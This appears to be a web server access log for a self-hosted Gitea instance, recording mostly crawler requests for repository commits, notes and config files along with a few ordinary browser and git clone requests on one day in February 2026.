200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 11508] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 60533] [Gzip 8.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10849] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 11652] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 216.73.216.188] [Length 11127] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10853] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 11679] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 458011] [Gzip 15.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 204135] [Gzip 13.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 11255] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 12103] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 11036] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 14067] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 12329] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 216.73.216.188] [Length 14289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 11764] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 12771] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 12519] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 34278] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 34263] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 34252] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 34278] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 17049] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 17049] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fwatchers" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 211386] [Gzip 13.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 23185] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 211409] [Gzip 13.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 23188] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 106865] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 400452] [Gzip 13.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 188161] [Gzip 11.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 188169] [Gzip 11.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 400445] [Gzip 13.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 106893] [Gzip 12.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 11494] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 13147] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 13369] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 400218] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 35998] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 17033] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 188148] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 211449] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore?display=rendered" [Client 216.73.216.188] [Length 11056] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 216.73.216.188] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 188165] [Gzip 11.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 17050] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 400217] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 211410] [Gzip 13.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 106885] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 106864] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:16:27 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:08:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:08:16:27 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:08:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 136.114.146.187] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-" -[15/Feb/2026:08:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 136.114.146.187] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-" -[15/Feb/2026:08:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 136.114.146.187] [Length 5665] [Gzip 2.43] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 136.114.146.187] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 136.114.146.187] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 136.114.146.187] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 136.114.146.187] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 136.114.146.187] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 136.114.146.187] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 136.114.146.187] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 136.114.146.187] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:08:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 136.114.146.187] [Length 88950] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" -[15/Feb/2026:08:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 136.114.146.187] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-" -[15/Feb/2026:09:25:34 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fcode-frequency" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=open" [Client 216.73.216.188] [Length 8471] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=closed" [Client 216.73.216.188] [Length 8482] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=open" [Client 216.73.216.188] [Length 8479] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:26:44 +0000] - 200 200 